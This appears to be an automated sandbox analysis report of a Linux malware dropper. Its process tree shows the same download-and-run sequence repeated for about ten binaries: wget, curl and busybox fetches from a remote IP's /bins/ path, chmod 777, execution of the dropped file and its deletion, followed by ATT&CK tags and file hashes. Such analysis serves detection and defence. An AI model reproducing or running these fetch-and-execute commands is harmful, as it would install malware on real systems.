/usr/bin/wgetwget http://87.120.84.230/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵PID:891
-
-
/bin/chmodchmod 777 EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC./EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵PID:897
-
-
/bin/chmodchmod 777 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf./3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:903
-
-
/bin/chmodchmod 777 c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q./c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:909
-
-
/bin/chmodchmod 777 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl./xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:917
-
-
/bin/chmodchmod 777 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb./CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:920
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:921
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:923
-
-
/bin/chmodchmod 777 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH./M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:926
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:927
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:929
-
-
/bin/chmodchmod 777 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI./JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:932
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:933
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:935
-
-
/bin/chmodchmod 777 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv./bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:938
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:939
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:941
-
-
/bin/chmodchmod 777 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K./eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:944
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:945
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:947
-
-
/bin/chmodchmod 777 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B./VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:950
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97